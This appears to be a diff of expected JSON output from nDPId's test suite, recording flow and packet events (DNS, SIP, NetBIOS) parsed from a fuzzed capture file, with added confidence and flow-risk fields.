+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469956233,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1120469956945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469956945,"pkt":"ADBUADRWAODtAW69CABFAABIakgAAIARTQnAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaSVzAGRrAAAhLwE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberci_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25707,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956945,"flow_last_seen":1120469956945,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469956945,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberci_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25707,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1120469957944,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469957944,"pkt":"ADBUADRWAODtAW69CABFAABIakkAAIARTQjAqAECwKgBAQq0ADUANP0xLN82AAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1120469959947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CABFAABIakoAAIARTQfAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2151,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469961950,"pkt":"ADBUADRWAODtAW69CGdFAABIaksAAIARTQbAqAECwKgBAQq0ADUAPP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2151}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1120469970215,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469970215,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOak0AAIARTADAqAECwKgB\/wCJIIkAOluRhQoBEAABAAAAAAAAIEVGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1120469973957,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469973957,"pkt":"ADBUADRWAODtAW69CABFAABEalEAAIARTQTAqAECwKgBAQq1ADUAMPFJM8AAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469973957,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1120469973959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469973959,"pkt":"YuDtAW69ADBUADRWCABFAABbAABAAEARtz7AqIIBwKgBAgA1CrUAR9PFM8CAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469973959,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1120469985981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469985981,"pkt":"ADBUADRWAODtAW69CABFAABIalMAAIARTP7AqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469986976,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1120469986976,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469986976,"pkt":"ADBUADRWAODtAW69CABFAABIalQAAIARTP3AqAECwKgBAQqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1120469988978,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469988978,"pkt":"ADBUADRWAODtAW69CABFAABIalUAAIARTPzAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAB1BF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAjAAE="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1120469990981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469990981,"pkt":"ADBUADRWAOLtAW69CABFAABIalYAAIARTPvAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470000407,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470000407,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
